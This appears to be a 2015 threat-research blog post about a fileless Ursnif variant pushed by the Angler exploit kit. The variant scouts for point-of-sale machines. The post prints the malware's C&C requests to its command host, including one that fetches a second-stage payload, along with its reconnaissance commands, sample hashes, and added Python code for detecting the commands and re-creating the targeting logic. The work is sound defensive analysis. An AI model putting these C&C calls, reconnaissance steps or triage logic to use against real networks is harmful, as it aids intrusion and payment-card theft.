2015-07-05 - Fileless Reco

A fileless Ursnif doing some POS-focused reconnaissance

Mission Impossible via Brixe63

At the beginning of June, I noticed a "different" Angler pass.
No drop, and Ursnif callbacks.

FileLess Angler Pass and Ursnif Callback
Mon, 01 Jun 2015 14:48:06 GMT

I had already encountered that "small Ursnif" multiple times. In November, for instance, an 18 KB sample pushed by Bedep: 380278c243a03c70dba89af2e6d4916f (grabbing a sample doing some IAP-like callback: 43fce12aace6e73fc7b1e1117595816e)

Ursnif sent to Bedep infected VM

and a few days later: ff1da0bbfc66762dbc1b2af52425f211

C&C calls in November 2014:

GET http://ipsalomenatep58highwayroad .biz:8080/photoLibrary/?user=c54acfbc9b5eef3b729f4025c17cefa2&id=1&ver=105&os=170393861&os2=512&host=0&k=1859056880&type=1
200 OK (text/html)

GET http://ipsalomenatep58highwayroad .biz:8080/photoLibrary/?user=c54acfbc9b5eef3b729f4025c17cefa2&id=1&ver=105&os=170393861&os2=512&host=0&k=1039729551&type=505
200 OK (text/html) < 2nd stage payload

What is new in that June pass is the fileless execution of this Ursnif. In that context, seeing it run a net view and a registry CurrentVersion\Uninstall query

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s /v DisplayName > C:\Users\[REDACTED]\AppData\Local\Temp\28096234.TMP"
cmd /C "net.exe view > C:\Users\[REDACTED]\AppData\Local\Temp\28097562.TMP"

before calling the C&C made me think this might be reconnaissance.
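The two commands above, each with its output redirected into a numbered .TMP file under the user's Temp folder, are a detectable pattern in process-creation telemetry. The Python below is an added example written for this page; it is not Ursnif's or Angler's code and not the post author's. It assumes events shaped like Sysmon Event ID 1 records (timestamp, host, parent PID, command line); the sample events, and the username "analyst" standing in for the redacted one, are constructed.

```python
"""Flag the Ursnif-style reconnaissance pair in process-creation telemetry.

Added example for this page, not code from Ursnif, Angler or the post's author.
Assumes events shaped like a Sysmon Event ID 1 / EDR process-creation record
(timestamp, host, parent PID, command line). SAMPLE_EVENTS are constructed and
the username "analyst" stands in for the redacted one in the post.
"""
import re
from datetime import datetime, timedelta

# Uninstall/DisplayName sweep: enumerates installed software.
RE_REG_UNINSTALL = re.compile(
    r'reg(?:\.exe)?\s+query\s+"?HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall"?'
    r'.*?/v\s+DisplayName',
    re.IGNORECASE,
)
# `net view`: enumerates the hosts visible on the network.
RE_NET_VIEW = re.compile(r'\bnet(?:\.exe)?\s+view\b', re.IGNORECASE)
# stdout redirected into a numbered .TMP under the user's %TEMP%, as in the post.
RE_TEMP_REDIRECT = re.compile(
    r'>\s*"?[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local\\Temp\\\d+\.TMP"?',
    re.IGNORECASE,
)


def classify_command(cmdline):
    """Tag one command line, or return None when it matches neither reco command."""
    to_temp = bool(RE_TEMP_REDIRECT.search(cmdline))
    if RE_REG_UNINSTALL.search(cmdline):
        return "uninstall_enum_to_temp" if to_temp else "uninstall_enum"
    if RE_NET_VIEW.search(cmdline):
        return "net_view_to_temp" if to_temp else "net_view"
    return None


def find_reco_pairs(events, window=timedelta(seconds=60)):
    """Correlate both reco commands per (host, parent PID) inside a time window.

    Either command alone is routine admin activity; the Uninstall sweep and the
    `net view`, both redirected into %TEMP%\\<digits>.TMP and spawned by the
    same parent within seconds, is the pattern worth alerting on.
    """
    by_parent = {}
    for ev in events:
        tag = classify_command(ev["cmdline"])
        if tag is None:
            continue
        by_parent.setdefault((ev["host"], ev["ppid"]), []).append(
            (ev["ts"], tag, ev["cmdline"]))
    alerts = []
    for (host, ppid), hits in by_parent.items():
        hits.sort()
        tags = {tag for _, tag, _ in hits}
        if {"uninstall_enum_to_temp", "net_view_to_temp"} <= tags:
            first, last = hits[0][0], hits[-1][0]
            if last - first <= window:
                alerts.append({"host": host, "ppid": ppid,
                               "span_s": (last - first).total_seconds(),
                               "commands": [cmd for _, _, cmd in hits]})
    return alerts


SAMPLE_EVENTS = [  # constructed; the first two mirror the commands in the post
    {"ts": datetime(2015, 6, 1, 14, 47, 50), "host": "WS01", "ppid": 2316,
     "cmdline": r'cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s /v DisplayName > C:\Users\analyst\AppData\Local\Temp\28096234.TMP"'},
    {"ts": datetime(2015, 6, 1, 14, 47, 51), "host": "WS01", "ppid": 2316,
     "cmdline": r'cmd /C "net.exe view > C:\Users\analyst\AppData\Local\Temp\28097562.TMP"'},
    # An admin browsing a file server: half the pattern, no %TEMP% redirect.
    {"ts": datetime(2015, 6, 1, 15, 2, 0), "host": "WS02", "ppid": 4100,
     "cmdline": r'net view \\FILESRV'},
    # A software-inventory script writing to stdout rather than %TEMP%.
    {"ts": datetime(2015, 6, 1, 15, 5, 0), "host": "WS03", "ppid": 700,
     "cmdline": r'reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s /v DisplayName'},
]

if __name__ == "__main__":
    for alert in find_reco_pairs(SAMPLE_EVENTS):
        print(alert)
```

The correlation key is (host, parent PID) plus a short window, because each command on its own is normal administration: the WS02 and WS03 events are tagged but never alerted on. In a real deployment the parent would typically be the exploited browser or Flash process rather than a user shell, which is a second, stronger signal to add.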

XTEA-decoded from the PCAP, the sample I got was:
Running it manually, I got it to grab (call with &type=505) an Andromeda.

Fileless Ursnif calling C&C, Grabbing Andromeda.
Andromeda Calling home.

On deeper inspection, it appears that this Ursnif is doing these kinds of checks:

Case one:
- POS/SALE/STORE in the net view output
- some URLs in the cache:
Case two:
- some entries in the registry:
VeriFone (which advertises itself as the "global leader in secure electronic POS solutions")
(there are two strings, Citrix and XenApp, but they do not seem to be directly used)

Case three:
- none of these, so a "lower value" (for them) machine.
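The three cases above amount to a triage routine over the output of the two reconnaissance commands. The Python below re-implements that triage as an added example for this page; it is not the malware's own code and not the post author's. The net view and registry markers are the ones the post names; the browser-cache URL check for case one is left out because the post does not reproduce the URL list; the &type values follow the observed calls (555 for case one, 505 for case three) and the one for case two is not stated in the post, so it stays None; the command outputs are constructed samples.

```python
"""Re-implementation of the target triage the post attributes to this Ursnif.

Added example for this page, not the malware's or the author's code. Inputs
are the text output of the two reco commands; the samples are constructed.
Assumptions: the cache-URL check is omitted (URL list not in the post) and
the &type for case two is unknown from the post, hence None.
"""
import re

NETVIEW_MARKERS = ("POS", "SALE", "STORE")   # named in the post
REGISTRY_MARKERS = ("VERIFONE",)             # named in the post
TYPE_FOR_CASE = {1: 555, 2: None, 3: 505}    # 555/505 observed; case two unknown


def net_view_entries(output):
    """Return the host lines (those starting with two backslashes) of `net view` output."""
    return [ln.strip() for ln in output.splitlines() if ln.lstrip().startswith("\\\\")]


def uninstall_display_names(output):
    """Return DisplayName values from `reg query ... /s /v DisplayName` output."""
    return re.findall(r"^\s*DisplayName\s+REG_SZ\s+(.*?)\s*$", output, re.MULTILINE)


def triage(net_view_output, reg_query_output):
    """Pick case 1, 2 or 3 the way the post describes it.

    Crude substring matching on upper-cased text: a host named DEPOSIT-SRV
    would count as "POS" too, which is the kind of false positive such a
    check produces for the attacker.
    """
    entries = net_view_entries(net_view_output)
    hits = sorted({m for e in entries for m in NETVIEW_MARKERS if m in e.upper()})
    if hits:
        return {"case": 1, "matched": hits, "type": TYPE_FOR_CASE[1]}
    names = uninstall_display_names(reg_query_output)
    hits = sorted({m for n in names for m in REGISTRY_MARKERS if m in n.upper()})
    if hits:
        return {"case": 2, "matched": hits, "type": TYPE_FOR_CASE[2]}
    return {"case": 3, "matched": [], "type": TYPE_FOR_CASE[3]}


# Constructed `net view` output: an ordinary office workstation's view.
NET_VIEW_PLAIN = r"""Server Name            Remark

-------------------------------------------------------------------------------
\\DC01                 Domain controller
\\FILESRV              Shares
The command completed successfully.
"""

# Constructed `net view` output with POS-flavoured host names (case one).
NET_VIEW_POS = r"""Server Name            Remark

-------------------------------------------------------------------------------
\\DC01                 Domain controller
\\POS-LANE3            Front register
\\STORE-BO             Back office
The command completed successfully.
"""

# Constructed `reg query HKLM\...\Uninstall /s /v DisplayName` output.
REG_QUERY_PLAIN = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
    DisplayName    REG_SZ    7-Zip 9.20

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{constructed-guid}
    DisplayName    REG_SZ    Example Office Suite
"""

# Same, plus a VeriFone entry (case two); the product name is constructed.
REG_QUERY_VERIFONE = REG_QUERY_PLAIN + r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{constructed-guid-2}
    DisplayName    REG_SZ    VeriFone Example Terminal Driver
"""

if __name__ == "__main__":
    print(triage(NET_VIEW_POS, REG_QUERY_PLAIN))
    print(triage(NET_VIEW_PLAIN, REG_QUERY_VERIFONE))
    print(triage(NET_VIEW_PLAIN, REG_QUERY_PLAIN))
```

The order of the checks matters: the net view markers are tested first, so a machine that is both on a POS network and has VeriFone software installed lands in case one, which is consistent with the post's reading that case one is the higher-value outcome.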

I made some modifications to my system to fall into case one:

Trying to get the attention of the Fileless Ursnif

And, as expected, it was something other than Andromeda that got dropped (C&C call with &type=555) on the machine:

76c240311df959961200a20f52b4026c, which appears to be a signed DLL

Signed Dll dropped by the Fileless Ursnif

and it decided to stick with the on-disk version of itself.

Conclusion: another smart use of the fileless capabilities of Angler.

Side note:
It seems type 666 and type 922 are other calls accepted by the C&C (one of them might be the VeriFone case).

Crafted C&C calls - note: type 666 and 922

The Fiddler capture, for those who can decrypt the traffic based on the key, is in the package (I'd be happy to hear about it).

Here is a package (multiple samples/PCAP/Fiddler):
Fileless Angler EK Pass (PCAP associated with the first screenshot)

[Update: 2015-09-04]
It's being pushed via Bedep these days:
Fileless Ursnif pushed via Bedep, but again no drop on disk (a method in Bedep that is new to me)
Sample: d8e950506fcb4617ef3bbcb16c4fba24
C&C: lokingforrealest.net (

31400 | | ACCELERATED | DE | kundenbetreuung.org | IP-Projects GmbH & Co. KG

Thanks:
Will Metcalf, Horgh_RCE and Fox-IT for help/input.

Post-publication readings:
Threat actor leverages Windows zero-day exploit in payment card data attacks - 2016-05-10 - FireEye
PowerSniff Malware Used in Macro-based Attacks - 2016-03-11 - Palo Alto
Angler Exploit Kit Used to Find and Infect PoS Systems - 2015-07-27 - Trend Micro